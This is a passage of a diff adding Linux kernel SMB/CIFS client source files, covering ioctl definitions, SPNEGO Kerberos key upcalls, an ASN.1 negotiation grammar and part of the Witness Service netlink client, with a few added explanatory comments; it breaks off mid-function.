++#define CIFS_MOUNT_NO_HANDLE_CACHE 0x4000000 /* disable caching dir handles */
++#define CIFS_MOUNT_NO_DFS 0x8000000 /* disable DFS resolving */
++#define CIFS_MOUNT_MODE_FROM_SID 0x10000000 /* retrieve mode from special ACE */
++#define CIFS_MOUNT_RO_CACHE	0x20000000  /* assumes share will not change */
++#define CIFS_MOUNT_RW_CACHE	0x40000000  /* assumes only client accessing */
++#define CIFS_MOUNT_SHUTDOWN	0x80000000
++
++struct cifs_sb_info {
++	struct rb_root tlink_tree;
++	spinlock_t tlink_tree_lock;
++	struct tcon_link *master_tlink;
++	struct nls_table *local_nls;
++	struct smb3_fs_context *ctx;
++	atomic_t active;
++	unsigned int mnt_cifs_flags;
++	struct delayed_work prune_tlinks;
++	struct rcu_head rcu;
++
++	/* only used when CIFS_MOUNT_USE_PREFIX_PATH is set */
++	char *prepath;
++
++	/* randomly generated 128-bit number for indexing dfs mount groups in referral cache */
++	uuid_t dfs_mount_id;
++	/*
++	 * Indicate whether serverino option was turned off later
++	 * (cifs_autodisable_serverino) in order to match new mounts.
++	 */
++	bool mnt_cifs_serverino_autodisabled;
++	/*
++	 * Available once the mount has completed.
++	 */
++	struct dentry *root;
++};
++#endif				/* _CIFS_FS_SB_H */
+diff --git a/fs/smb/client/cifs_ioctl.h b/fs/smb/client/cifs_ioctl.h
+new file mode 100644
+index 0000000000000..d86d78d5bfdc1
+--- /dev/null
++++ b/fs/smb/client/cifs_ioctl.h
+@@ -0,0 +1,126 @@
++/* SPDX-License-Identifier: LGPL-2.1 */
++/*
++ *
++ *   Structure definitions for io control for cifs/smb3
++ *
++ *   Copyright (c) 2015 Steve French <steve.french@primarydata.com>
++ *
++ */
++
++struct smb_mnt_fs_info {
++	__u32	version; /* 0001 */
++	__u16	protocol_id;
++	__u16	tcon_flags;
++	__u32	vol_serial_number;
++	__u32	vol_create_time;
++	__u32	share_caps;
++	__u32	share_flags;
++	__u32	sector_flags;
++	__u32	optimal_sector_size;
++	__u32	max_bytes_chunk;
++	__u32	fs_attributes;
++	__u32	max_path_component;
++	__u32	device_type;
++	__u32	device_characteristics;
++	__u32	maximal_access;
++	__u64   cifs_posix_caps;
++} __packed;
++
++struct smb_snapshot_array {
++	__u32	number_of_snapshots;
++	__u32	number_of_snapshots_returned;
++	__u32	snapshot_array_size;
++	/*	snapshots[]; */
++} __packed;
++
++/* query_info flags */
++#define PASSTHRU_QUERY_INFO	0x00000000
++#define PASSTHRU_FSCTL		0x00000001
++#define PASSTHRU_SET_INFO	0x00000002
++struct smb_query_info {
++	__u32   info_type;
++	__u32   file_info_class;
++	__u32   additional_information;
++	__u32   flags;
++	__u32	input_buffer_length;
++	__u32	output_buffer_length;
++	/* char buffer[]; */
++} __packed;
++
++/*
++ * Dumping the commonly used 16 byte (e.g. CCM and GCM128) keys still supported
++ * for backlevel compatibility, but is not sufficient for dumping the less
++ * frequently used GCM256 (32 byte) keys (see the newer "CIFS_DUMP_FULL_KEY"
++ * ioctl for dumping decryption info for GCM256 mounts)
++ */
++struct smb3_key_debug_info {
++	__u64	Suid;
++	__u16	cipher_type;
++	__u8	auth_key[16]; /* SMB2_NTLMV2_SESSKEY_SIZE */
++	__u8	smb3encryptionkey[SMB3_SIGN_KEY_SIZE];
++	__u8	smb3decryptionkey[SMB3_SIGN_KEY_SIZE];
++} __packed;
++
++/*
++ * Dump variable-sized keys
++ */
++struct smb3_full_key_debug_info {
++	/* INPUT: size of userspace buffer */
++	__u32   in_size;
++
++	/*
++	 * INPUT: 0 for current user, otherwise session to dump
++	 * OUTPUT: session id that was dumped
++	 */
++	__u64	session_id;
++	__u16	cipher_type;
++	__u8    session_key_length;
++	__u8    server_in_key_length;
++	__u8    server_out_key_length;
++	__u8    data[];
++	/*
++	 * return this struct with the keys appended at the end:
++	 * __u8 session_key[session_key_length];
++	 * __u8 server_in_key[server_in_key_length];
++	 * __u8 server_out_key[server_out_key_length];
++	 */
++} __packed;
++
++struct smb3_notify {
++	__u32	completion_filter;
++	bool	watch_tree;
++} __packed;
++
++struct smb3_notify_info {
++	__u32	completion_filter;
++	bool	watch_tree;
++	__u32   data_len; /* size of notify data below */
++	__u8	notify_data[];
++} __packed;
++
++#define CIFS_IOCTL_MAGIC	0xCF
++#define CIFS_IOC_COPYCHUNK_FILE	_IOW(CIFS_IOCTL_MAGIC, 3, int)
++#define CIFS_IOC_SET_INTEGRITY  _IO(CIFS_IOCTL_MAGIC, 4)
++#define CIFS_IOC_GET_MNT_INFO _IOR(CIFS_IOCTL_MAGIC, 5, struct smb_mnt_fs_info)
++#define CIFS_ENUMERATE_SNAPSHOTS _IOR(CIFS_IOCTL_MAGIC, 6, struct smb_snapshot_array)
++#define CIFS_QUERY_INFO _IOWR(CIFS_IOCTL_MAGIC, 7, struct smb_query_info)
++#define CIFS_DUMP_KEY _IOWR(CIFS_IOCTL_MAGIC, 8, struct smb3_key_debug_info)
++#define CIFS_IOC_NOTIFY _IOW(CIFS_IOCTL_MAGIC, 9, struct smb3_notify)
++#define CIFS_DUMP_FULL_KEY _IOWR(CIFS_IOCTL_MAGIC, 10, struct smb3_full_key_debug_info)
++#define CIFS_IOC_NOTIFY_INFO _IOWR(CIFS_IOCTL_MAGIC, 11, struct smb3_notify_info)
++#define CIFS_IOC_SHUTDOWN _IOR ('X', 125, __u32)
++
++/*
++ * Flags for going down operation
++ */
++#define CIFS_GOING_FLAGS_DEFAULT                0x0     /* going down */
++#define CIFS_GOING_FLAGS_LOGFLUSH               0x1     /* flush log but not data */
++#define CIFS_GOING_FLAGS_NOLOGFLUSH             0x2     /* don't flush log nor data */
++
++static inline bool cifs_forced_shutdown(struct cifs_sb_info *sbi)
++{
++	if (CIFS_MOUNT_SHUTDOWN & sbi->mnt_cifs_flags)
++		return true;
++	else
++		return false;
++}
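++
++/*
++ * Illustrative userspace usage of the shutdown ioctl (an editorial sketch,
++ * not part of this header):
++ *
++ *	__u32 flags = CIFS_GOING_FLAGS_DEFAULT;
++ *	ioctl(fd, CIFS_IOC_SHUTDOWN, &flags);
++ *
++ * where fd refers to an open file on the cifs mount being shut down.
++ */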
+diff --git a/fs/smb/client/cifs_spnego.c b/fs/smb/client/cifs_spnego.c
+new file mode 100644
+index 0000000000000..342717bf1dc28
+--- /dev/null
++++ b/fs/smb/client/cifs_spnego.c
+@@ -0,0 +1,236 @@
++// SPDX-License-Identifier: LGPL-2.1
++/*
++ *   SPNEGO upcall management for CIFS
++ *
++ *   Copyright (c) 2007 Red Hat, Inc.
++ *   Author(s): Jeff Layton (jlayton@redhat.com)
++ *
++ */
++
++#include <linux/list.h>
++#include <linux/slab.h>
++#include <linux/string.h>
++#include <keys/user-type.h>
++#include <linux/key-type.h>
++#include <linux/keyctl.h>
++#include <linux/inet.h>
++#include "cifsglob.h"
++#include "cifs_spnego.h"
++#include "cifs_debug.h"
++#include "cifsproto.h"
++static const struct cred *spnego_cred;
++
++/* create a new cifs key */
++static int
++cifs_spnego_key_instantiate(struct key *key, struct key_preparsed_payload *prep)
++{
++	char *payload;
++	int ret;
++
++	ret = -ENOMEM;
++	payload = kmemdup(prep->data, prep->datalen, GFP_KERNEL);
++	if (!payload)
++		goto error;
++
++	/* attach the data */
++	key->payload.data[0] = payload;
++	ret = 0;
++
++error:
++	return ret;
++}
++
++static void
++cifs_spnego_key_destroy(struct key *key)
++{
++	kfree(key->payload.data[0]);
++}
++
++
++/*
++ * keytype for CIFS spnego keys
++ */
++struct key_type cifs_spnego_key_type = {
++	.name		= "cifs.spnego",
++	.instantiate	= cifs_spnego_key_instantiate,
++	.destroy	= cifs_spnego_key_destroy,
++	.describe	= user_describe,
++};
++
++/* length of longest version string, e.g. strlen("ver=0xFF") */
++#define MAX_VER_STR_LEN		8
++
++/* length of longest security mechanism name, e.g. in future could have
++ * strlen(";sec=ntlmsspi") */
++#define MAX_MECH_STR_LEN	13
++
++/* strlen of "host=" */
++#define HOST_KEY_LEN		5
++
++/* strlen of ";ip4=" or ";ip6=" */
++#define IP_KEY_LEN		5
++
++/* strlen of ";uid=0x" */
++#define UID_KEY_LEN		7
++
++/* strlen of ";creduid=0x" */
++#define CREDUID_KEY_LEN		11
++
++/* strlen of ";user=" */
++#define USER_KEY_LEN		6
++
++/* strlen of ";pid=0x" */
++#define PID_KEY_LEN		7
++
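++/*
++ * Illustrative example of a generated key description (values made up, not
++ * from the original source):
++ *
++ *	ver=0x2;host=fileserver;ip4=192.0.2.10;sec=krb5;uid=0x3e8;creduid=0x3e8;user=jdoe;pid=0x1f40
++ */
++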
++/* get a key struct with a SPNEGO security blob, suitable for session setup */
++struct key *
++cifs_get_spnego_key(struct cifs_ses *sesInfo,
++		    struct TCP_Server_Info *server)
++{
++	struct sockaddr_in *sa = (struct sockaddr_in *) &server->dstaddr;
++	struct sockaddr_in6 *sa6 = (struct sockaddr_in6 *) &server->dstaddr;
++	char *description, *dp;
++	size_t desc_len;
++	struct key *spnego_key;
++	const char *hostname = server->hostname;
++	const struct cred *saved_cred;
++
++	/*
++	 * length of fields (with semicolons): ver=0xyz ip4=ipaddress
++	 * host=hostname sec=mechanism uid=0xFF user=username
++	 */
++	desc_len = MAX_VER_STR_LEN +
++		   HOST_KEY_LEN + strlen(hostname) +
++		   IP_KEY_LEN + INET6_ADDRSTRLEN +
++		   MAX_MECH_STR_LEN +
++		   UID_KEY_LEN + (sizeof(uid_t) * 2) +
++		   CREDUID_KEY_LEN + (sizeof(uid_t) * 2) +
++		   PID_KEY_LEN + (sizeof(pid_t) * 2) + 1;
++
++	if (sesInfo->user_name)
++		desc_len += USER_KEY_LEN + strlen(sesInfo->user_name);
++
++	spnego_key = ERR_PTR(-ENOMEM);
++	description = kzalloc(desc_len, GFP_KERNEL);
++	if (description == NULL)
++		goto out;
++
++	dp = description;
++	/* start with version and hostname portion of UNC string */
++	spnego_key = ERR_PTR(-EINVAL);
++	sprintf(dp, "ver=0x%x;host=%s;", CIFS_SPNEGO_UPCALL_VERSION,
++		hostname);
++	dp = description + strlen(description);
++
++	/* add the server address */
++	if (server->dstaddr.ss_family == AF_INET)
++		sprintf(dp, "ip4=%pI4", &sa->sin_addr);
++	else if (server->dstaddr.ss_family == AF_INET6)
++		sprintf(dp, "ip6=%pI6", &sa6->sin6_addr);
++	else
++		goto out;
++
++	dp = description + strlen(description);
++
++	/* for now, only sec=krb5 and sec=mskrb5 are valid */
++	if (server->sec_kerberos)
++		sprintf(dp, ";sec=krb5");
++	else if (server->sec_mskerberos)
++		sprintf(dp, ";sec=mskrb5");
++	else {
++		cifs_dbg(VFS, "unknown or missing server auth type, use krb5\n");
++		sprintf(dp, ";sec=krb5");
++	}
++
++	dp = description + strlen(description);
++	sprintf(dp, ";uid=0x%x",
++		from_kuid_munged(&init_user_ns, sesInfo->linux_uid));
++
++	dp = description + strlen(description);
++	sprintf(dp, ";creduid=0x%x",
++		from_kuid_munged(&init_user_ns, sesInfo->cred_uid));
++
++	if (sesInfo->user_name) {
++		dp = description + strlen(description);
++		sprintf(dp, ";user=%s", sesInfo->user_name);
++	}
++
++	dp = description + strlen(description);
++	sprintf(dp, ";pid=0x%x", current->pid);
++
++	cifs_dbg(FYI, "key description = %s\n", description);
++	saved_cred = override_creds(spnego_cred);
++	spnego_key = request_key(&cifs_spnego_key_type, description, "");
++	revert_creds(saved_cred);
++
++#ifdef CONFIG_CIFS_DEBUG2
++	if (cifsFYI && !IS_ERR(spnego_key)) {
++		struct cifs_spnego_msg *msg = spnego_key->payload.data[0];
++		cifs_dump_mem("SPNEGO reply blob:", msg->data, min(1024U,
++				msg->secblob_len + msg->sesskey_len));
++	}
++#endif /* CONFIG_CIFS_DEBUG2 */
++
++out:
++	kfree(description);
++	return spnego_key;
++}
++
++int
++init_cifs_spnego(void)
++{
++	struct cred *cred;
++	struct key *keyring;
++	int ret;
++
++	cifs_dbg(FYI, "Registering the %s key type\n",
++		 cifs_spnego_key_type.name);
++
++	/*
++	 * Create an override credential set with special thread keyring for
++	 * spnego upcalls.
++	 */
++
++	cred = prepare_kernel_cred(NULL);
++	if (!cred)
++		return -ENOMEM;
++
++	keyring = keyring_alloc(".cifs_spnego",
++				GLOBAL_ROOT_UID, GLOBAL_ROOT_GID, cred,
++				(KEY_POS_ALL & ~KEY_POS_SETATTR) |
++				KEY_USR_VIEW | KEY_USR_READ,
++				KEY_ALLOC_NOT_IN_QUOTA, NULL, NULL);
++	if (IS_ERR(keyring)) {
++		ret = PTR_ERR(keyring);
++		goto failed_put_cred;
++	}
++
++	ret = register_key_type(&cifs_spnego_key_type);
++	if (ret < 0)
++		goto failed_put_key;
++
++	/*
++	 * instruct request_key() to use this special keyring as a cache for
++	 * the results it looks up
++	 */
++	set_bit(KEY_FLAG_ROOT_CAN_CLEAR, &keyring->flags);
++	cred->thread_keyring = keyring;
++	cred->jit_keyring = KEY_REQKEY_DEFL_THREAD_KEYRING;
++	spnego_cred = cred;
++
++	cifs_dbg(FYI, "cifs spnego keyring: %d\n", key_serial(keyring));
++	return 0;
++
++failed_put_key:
++	key_put(keyring);
++failed_put_cred:
++	put_cred(cred);
++	return ret;
++}
++
++void
++exit_cifs_spnego(void)
++{
++	key_revoke(spnego_cred->thread_keyring);
++	unregister_key_type(&cifs_spnego_key_type);
++	put_cred(spnego_cred);
++	cifs_dbg(FYI, "Unregistered %s key type\n", cifs_spnego_key_type.name);
++}
+diff --git a/fs/smb/client/cifs_spnego.h b/fs/smb/client/cifs_spnego.h
+new file mode 100644
+index 0000000000000..7f102ffeb6750
+--- /dev/null
++++ b/fs/smb/client/cifs_spnego.h
+@@ -0,0 +1,36 @@
++/* SPDX-License-Identifier: LGPL-2.1 */
++/*
++ *   SPNEGO upcall management for CIFS
++ *
++ *   Copyright (c) 2007 Red Hat, Inc.
++ *   Author(s): Jeff Layton (jlayton@redhat.com)
++ *              Steve French (sfrench@us.ibm.com)
++ *
++ */
++
++#ifndef _CIFS_SPNEGO_H
++#define _CIFS_SPNEGO_H
++
++#define CIFS_SPNEGO_UPCALL_VERSION 2
++
++/*
++ * The version field should always be set to CIFS_SPNEGO_UPCALL_VERSION.
++ * The flags field is for future use. The request-key callout should set
++ * sesskey_len and secblob_len, and then concatenate the SessKey+SecBlob
++ * and stuff it in the data field.
++ */
++struct cifs_spnego_msg {
++	uint32_t	version;
++	uint32_t	flags;
++	uint32_t	sesskey_len;
++	uint32_t	secblob_len;
++	uint8_t		data[1];
++};
++
++#ifdef __KERNEL__
++extern struct key_type cifs_spnego_key_type;
++extern struct key *cifs_get_spnego_key(struct cifs_ses *sesInfo,
++				       struct TCP_Server_Info *server);
++#endif /* __KERNEL__ */
++
++#endif /* _CIFS_SPNEGO_H */
+diff --git a/fs/smb/client/cifs_spnego_negtokeninit.asn1 b/fs/smb/client/cifs_spnego_negtokeninit.asn1
+new file mode 100644
+index 0000000000000..181c083887d51
+--- /dev/null
++++ b/fs/smb/client/cifs_spnego_negtokeninit.asn1
+@@ -0,0 +1,40 @@
++GSSAPI ::=
++	[APPLICATION 0] IMPLICIT SEQUENCE {
++		thisMech
++			OBJECT IDENTIFIER ({cifs_gssapi_this_mech}),
++		negotiationToken
++			NegotiationToken
++	}
++
++MechType ::= OBJECT IDENTIFIER ({cifs_neg_token_init_mech_type})
++
++MechTypeList ::= SEQUENCE OF MechType
++
++NegHints ::= SEQUENCE {
++	hintName
++		[0] GeneralString OPTIONAL,
++	hintAddress
++		[1] OCTET STRING OPTIONAL
++	}
++
++NegTokenInit2 ::=
++	SEQUENCE {
++		mechTypes
++			[0] MechTypeList OPTIONAL,
++		reqFlags
++			[1] BIT STRING OPTIONAL,
++		mechToken
++			[2] OCTET STRING OPTIONAL,
++		negHints
++			[3] NegHints OPTIONAL,
++		mechListMIC
++			[3] OCTET STRING OPTIONAL
++	}
++
++NegotiationToken ::=
++	CHOICE {
++		negTokenInit
++			[0] NegTokenInit2,
++		negTokenTarg
++			[1] ANY
++	}
+diff --git a/fs/smb/client/cifs_swn.c b/fs/smb/client/cifs_swn.c
+new file mode 100644
+index 0000000000000..7233c6a7e6d70
+--- /dev/null
++++ b/fs/smb/client/cifs_swn.c
+@@ -0,0 +1,674 @@
++// SPDX-License-Identifier: GPL-2.0
++/*
++ * Witness Service client for CIFS
++ *
++ * Copyright (c) 2020 Samuel Cabrero <scabrero@suse.de>
++ */
++
++#include <linux/kref.h>
++#include <net/genetlink.h>
++#include <uapi/linux/cifs/cifs_netlink.h>
++
++#include "cifs_swn.h"
++#include "cifsglob.h"
++#include "cifsproto.h"
++#include "fscache.h"
++#include "cifs_debug.h"
++#include "netlink.h"
++
++static DEFINE_IDR(cifs_swnreg_idr);
++static DEFINE_MUTEX(cifs_swnreg_idr_mutex);
++
++struct cifs_swn_reg {
++	int id;
++	struct kref ref_count;
++
++	const char *net_name;
++	const char *share_name;
++	bool net_name_notify;
++	bool share_name_notify;
++	bool ip_notify;
++
++	struct cifs_tcon *tcon;
++};
++
++static int cifs_swn_auth_info_krb(struct cifs_tcon *tcon, struct sk_buff *skb)
++{
++	int ret;
++
++	ret = nla_put_flag(skb, CIFS_GENL_ATTR_SWN_KRB_AUTH);
++	if (ret < 0)
++		return ret;
++
++	return 0;
++}
++
++static int cifs_swn_auth_info_ntlm(struct cifs_tcon *tcon, struct sk_buff *skb)
++{
++	int ret;
++
++	if (tcon->ses->user_name != NULL) {
++		ret = nla_put_string(skb, CIFS_GENL_ATTR_SWN_USER_NAME, tcon->ses->user_name);
++		if (ret < 0)
++			return ret;
++	}
++
++	if (tcon->ses->password != NULL) {
++		ret = nla_put_string(skb, CIFS_GENL_ATTR_SWN_PASSWORD, tcon->ses->password);
++		if (ret < 0)
++			return ret;
++	}
++
++	if (tcon->ses->domainName != NULL) {
++		ret = nla_put_string(skb, CIFS_GENL_ATTR_SWN_DOMAIN_NAME, tcon->ses->domainName);
++		if (ret < 0)
++			return ret;
++	}
++
++	return 0;
++}
++
++/*
++ * Sends a register message to the userspace daemon based on the registration.
++ * The authentication information to connect to the witness service is bundled
++ * into the message.
++ */
++static int cifs_swn_send_register_message(struct cifs_swn_reg *swnreg)
++{
++	struct sk_buff *skb;
++	struct genlmsghdr *hdr;
++	enum securityEnum authtype;
++	struct sockaddr_storage *addr;
++	int ret;
++
++	skb = genlmsg_new(NLMSG_DEFAULT_SIZE, GFP_KERNEL);
++	if (skb == NULL) {
++		ret = -ENOMEM;
++		goto fail;
++	}
++
++	hdr = genlmsg_put(skb, 0, 0, &cifs_genl_family, 0, CIFS_GENL_CMD_SWN_REGISTER);
++	if (hdr == NULL) {
++		ret = -ENOMEM;
++		goto nlmsg_fail;
++	}
++
++	ret = nla_put_u32(skb, CIFS_GENL_ATTR_SWN_REGISTRATION_ID, swnreg->id);
++	if (ret < 0)
++		goto nlmsg_fail;
++
++	ret = nla_put_string(skb, CIFS_GENL_ATTR_SWN_NET_NAME, swnreg->net_name);
++	if (ret < 0)
++		goto nlmsg_fail;
++
++	ret = nla_put_string(skb, CIFS_GENL_ATTR_SWN_SHARE_NAME, swnreg->share_name);
++	if (ret < 0)
++		goto nlmsg_fail;
++
++	/*
++	 * If there is an address stored use it instead of the server address, because we are
++	 * in the process of reconnecting to it after a share has been moved or we have been
++	 * told to switch to it (client move message). In these cases we unregister from the
++	 * server address and register to the new address when we receive the notification.
++	 */
++	if (swnreg->tcon->ses->server->use_swn_dstaddr)
++		addr = &swnreg->tcon->ses->server->swn_dstaddr;
++	else
++		addr = &swnreg->tcon->ses->server->dstaddr;
++
++	ret = nla_put(skb, CIFS_GENL_ATTR_SWN_IP, sizeof(struct sockaddr_storage), addr);
++	if (ret < 0)
++		goto nlmsg_fail;
++
++	if (swnreg->net_name_notify) {
++		ret = nla_put_flag(skb, CIFS_GENL_ATTR_SWN_NET_NAME_NOTIFY);
++		if (ret < 0)
++			goto nlmsg_fail;
++	}
++
++	if (swnreg->share_name_notify) {
++		ret = nla_put_flag(skb, CIFS_GENL_ATTR_SWN_SHARE_NAME_NOTIFY);
++		if (ret < 0)
++			goto nlmsg_fail;
++	}
++
++	if (swnreg->ip_notify) {
++		ret = nla_put_flag(skb, CIFS_GENL_ATTR_SWN_IP_NOTIFY);
++		if (ret < 0)
++			goto nlmsg_fail;
++	}
++
++	authtype = cifs_select_sectype(swnreg->tcon->ses->server, swnreg->tcon->ses->sectype);
++	switch (authtype) {
++	case Kerberos:
++		ret = cifs_swn_auth_info_krb(swnreg->tcon, skb);
++		if (ret < 0) {
++			cifs_dbg(VFS, "%s: Failed to get kerberos auth info: %d\n", __func__, ret);
++			goto nlmsg_fail;
++		}
++		break;
++	case NTLMv2:
++	case RawNTLMSSP:
++		ret = cifs_swn_auth_info_ntlm(swnreg->tcon, skb);
++		if (ret < 0) {
++			cifs_dbg(VFS, "%s: Failed to get NTLM auth info: %d\n", __func__, ret);
++			goto nlmsg_fail;
++		}
++		break;
++	default:
++		cifs_dbg(VFS, "%s: secType %d not supported!\n", __func__, authtype);
++		ret = -EINVAL;
++		goto nlmsg_fail;
++	}
++
++	genlmsg_end(skb, hdr);
++	genlmsg_multicast(&cifs_genl_family, skb, 0, CIFS_GENL_MCGRP_SWN, GFP_ATOMIC);
++
++	cifs_dbg(FYI, "%s: Message to register for network name %s with id %d sent\n", __func__,
++			swnreg->net_name, swnreg->id);
++
++	return 0;
++
++nlmsg_fail:
++	genlmsg_cancel(skb, hdr);
++	nlmsg_free(skb);
++fail:
++	return ret;
++}
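++
++/*
++ * Editorial note: the register message carries, at minimum, the registration
++ * id, net name, share name and server address; the userspace daemon uses the
++ * registration id to route notifications back to this registration (see
++ * cifs_swn_notify()).
++ */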
++
++/*
++ * Sends an unregister message to the userspace daemon based on the
++ * registration.
++ */
++static int cifs_swn_send_unregister_message(struct cifs_swn_reg *swnreg)
++{
++	struct sk_buff *skb;
++	struct genlmsghdr *hdr;
++	int ret;
++
++	skb = genlmsg_new(NLMSG_DEFAULT_SIZE, GFP_KERNEL);
++	if (skb == NULL)
++		return -ENOMEM;
++
++	hdr = genlmsg_put(skb, 0, 0, &cifs_genl_family, 0, CIFS_GENL_CMD_SWN_UNREGISTER);
++	if (hdr == NULL) {
++		ret = -ENOMEM;
++		goto nlmsg_fail;
++	}
++
++	ret = nla_put_u32(skb, CIFS_GENL_ATTR_SWN_REGISTRATION_ID, swnreg->id);
++	if (ret < 0)
++		goto nlmsg_fail;
++
++	ret = nla_put_string(skb, CIFS_GENL_ATTR_SWN_NET_NAME, swnreg->net_name);
++	if (ret < 0)
++		goto nlmsg_fail;
++
++	ret = nla_put_string(skb, CIFS_GENL_ATTR_SWN_SHARE_NAME, swnreg->share_name);
++	if (ret < 0)
++		goto nlmsg_fail;
++
++	ret = nla_put(skb, CIFS_GENL_ATTR_SWN_IP, sizeof(struct sockaddr_storage),
++			&swnreg->tcon->ses->server->dstaddr);
++	if (ret < 0)
++		goto nlmsg_fail;
++
++	if (swnreg->net_name_notify) {
++		ret = nla_put_flag(skb, CIFS_GENL_ATTR_SWN_NET_NAME_NOTIFY);
++		if (ret < 0)
++			goto nlmsg_fail;
++	}
++
++	if (swnreg->share_name_notify) {
++		ret = nla_put_flag(skb, CIFS_GENL_ATTR_SWN_SHARE_NAME_NOTIFY);
++		if (ret < 0)
++			goto nlmsg_fail;
++	}
++
++	if (swnreg->ip_notify) {
++		ret = nla_put_flag(skb, CIFS_GENL_ATTR_SWN_IP_NOTIFY);
++		if (ret < 0)
++			goto nlmsg_fail;
++	}
++
++	genlmsg_end(skb, hdr);
++	genlmsg_multicast(&cifs_genl_family, skb, 0, CIFS_GENL_MCGRP_SWN, GFP_ATOMIC);
++
++	cifs_dbg(FYI, "%s: Message to unregister for network name %s with id %d sent\n", __func__,
++			swnreg->net_name, swnreg->id);
++
++	return 0;
++
++nlmsg_fail:
++	genlmsg_cancel(skb, hdr);
++	nlmsg_free(skb);
++	return ret;
++}
++
++/*
++ * Try to find a matching registration for the tcon's server name and share name.
++ * Calls to this function must be protected by cifs_swnreg_idr_mutex.
++ * TODO: try to avoid memory allocations
++ */
++static struct cifs_swn_reg *cifs_find_swn_reg(struct cifs_tcon *tcon)
++{
++	struct cifs_swn_reg *swnreg;
++	int id;
++	const char *share_name;
++	const char *net_name;
++
++	net_name = extract_hostname(tcon->tree_name);
++	if (IS_ERR(net_name)) {
++		int ret;
++
++		ret = PTR_ERR(net_name);
++		cifs_dbg(VFS, "%s: failed to extract host name from target '%s': %d\n",
++				__func__, tcon->tree_name, ret);
++		return ERR_PTR(-EINVAL);
++	}
++
++	share_name = extract_sharename(tcon->tree_name);
++	if (IS_ERR(share_name)) {
++		int ret;
++
++		ret = PTR_ERR(share_name);
++		cifs_dbg(VFS, "%s: failed to extract share name from target '%s': %d\n",
++				__func__, tcon->tree_name, ret);
++		kfree(net_name);
++		return ERR_PTR(-EINVAL);
++	}
++
++	idr_for_each_entry(&cifs_swnreg_idr, swnreg, id) {
++		if (strcasecmp(swnreg->net_name, net_name) != 0
++		    || strcasecmp(swnreg->share_name, share_name) != 0) {
++			continue;
++		}
++
++		cifs_dbg(FYI, "Existing swn registration for %s:%s found\n", swnreg->net_name,
++				swnreg->share_name);
++
++		kfree(net_name);
++		kfree(share_name);
++
++		return swnreg;
++	}
++
++	kfree(net_name);
++	kfree(share_name);
++
++	return ERR_PTR(-EEXIST);
++}
++
++/*
++ * Get a registration for the tcon's server and share name, allocating a new
++ * one if it does not exist
++ */
++static struct cifs_swn_reg *cifs_get_swn_reg(struct cifs_tcon *tcon)
++{
++	struct cifs_swn_reg *reg = NULL;
++	int ret;
++
++	mutex_lock(&cifs_swnreg_idr_mutex);
++
++	/* Check if we are already registered for this network and share names */
++	reg = cifs_find_swn_reg(tcon);
++	if (!IS_ERR(reg)) {
++		kref_get(&reg->ref_count);
++		mutex_unlock(&cifs_swnreg_idr_mutex);
++		return reg;
++	} else if (PTR_ERR(reg) != -EEXIST) {
++		mutex_unlock(&cifs_swnreg_idr_mutex);
++		return reg;
++	}
++
++	reg = kmalloc(sizeof(struct cifs_swn_reg), GFP_ATOMIC);
++	if (reg == NULL) {
++		mutex_unlock(&cifs_swnreg_idr_mutex);
++		return ERR_PTR(-ENOMEM);
++	}
++
++	kref_init(&reg->ref_count);
++
++	reg->id = idr_alloc(&cifs_swnreg_idr, reg, 1, 0, GFP_ATOMIC);
++	if (reg->id < 0) {
++		cifs_dbg(FYI, "%s: failed to allocate registration id\n", __func__);
++		ret = reg->id;
++		goto fail;
++	}
++
++	reg->net_name = extract_hostname(tcon->tree_name);
++	if (IS_ERR(reg->net_name)) {
++		ret = PTR_ERR(reg->net_name);
++		cifs_dbg(VFS, "%s: failed to extract host name from target: %d\n", __func__, ret);
++		goto fail_idr;
++	}
++
++	reg->share_name = extract_sharename(tcon->tree_name);
++	if (IS_ERR(reg->share_name)) {
++		ret = PTR_ERR(reg->share_name);
++		cifs_dbg(VFS, "%s: failed to extract share name from target: %d\n", __func__, ret);
++		goto fail_net_name;
++	}
++
++	reg->net_name_notify = true;
++	reg->share_name_notify = true;
++	reg->ip_notify = (tcon->capabilities & SMB2_SHARE_CAP_SCALEOUT);
++
++	reg->tcon = tcon;
++
++	mutex_unlock(&cifs_swnreg_idr_mutex);
++
++	return reg;
++
++fail_net_name:
++	kfree(reg->net_name);
++fail_idr:
++	idr_remove(&cifs_swnreg_idr, reg->id);
++fail:
++	kfree(reg);
++	mutex_unlock(&cifs_swnreg_idr_mutex);
++	return ERR_PTR(ret);
++}
++
++static void cifs_swn_reg_release(struct kref *ref)
++{
++	struct cifs_swn_reg *swnreg = container_of(ref, struct cifs_swn_reg, ref_count);
++	int ret;
++
++	ret = cifs_swn_send_unregister_message(swnreg);
++	if (ret < 0)
++		cifs_dbg(VFS, "%s: Failed to send unregister message: %d\n", __func__, ret);
++
++	idr_remove(&cifs_swnreg_idr, swnreg->id);
++	kfree(swnreg->net_name);
++	kfree(swnreg->share_name);
++	kfree(swnreg);
++}
++
++static void cifs_put_swn_reg(struct cifs_swn_reg *swnreg)
++{
++	mutex_lock(&cifs_swnreg_idr_mutex);
++	kref_put(&swnreg->ref_count, cifs_swn_reg_release);
++	mutex_unlock(&cifs_swnreg_idr_mutex);
++}
++
++static int cifs_swn_resource_state_changed(struct cifs_swn_reg *swnreg, const char *name, int state)
++{
++	switch (state) {
++	case CIFS_SWN_RESOURCE_STATE_UNAVAILABLE:
++		cifs_dbg(FYI, "%s: resource name '%s' become unavailable\n", __func__, name);
++		cifs_signal_cifsd_for_reconnect(swnreg->tcon->ses->server, true);
++		break;
++	case CIFS_SWN_RESOURCE_STATE_AVAILABLE:
++		cifs_dbg(FYI, "%s: resource name '%s' become available\n", __func__, name);
++		cifs_signal_cifsd_for_reconnect(swnreg->tcon->ses->server, true);
++		break;
++	case CIFS_SWN_RESOURCE_STATE_UNKNOWN:
++		cifs_dbg(FYI, "%s: resource name '%s' changed to unknown state\n", __func__, name);
++		break;
++	}
++	return 0;
++}
++
++static bool cifs_sockaddr_equal(struct sockaddr_storage *addr1, struct sockaddr_storage *addr2)
++{
++	if (addr1->ss_family != addr2->ss_family)
++		return false;
++
++	if (addr1->ss_family == AF_INET) {
++		return (memcmp(&((const struct sockaddr_in *)addr1)->sin_addr,
++				&((const struct sockaddr_in *)addr2)->sin_addr,
++				sizeof(struct in_addr)) == 0);
++	}
++
++	if (addr1->ss_family == AF_INET6) {
++		return (memcmp(&((const struct sockaddr_in6 *)addr1)->sin6_addr,
++				&((const struct sockaddr_in6 *)addr2)->sin6_addr,
++				sizeof(struct in6_addr)) == 0);
++	}
++
++	return false;
++}
++
++static int cifs_swn_store_swn_addr(const struct sockaddr_storage *new,
++				   const struct sockaddr_storage *old,
++				   struct sockaddr_storage *dst)
++{
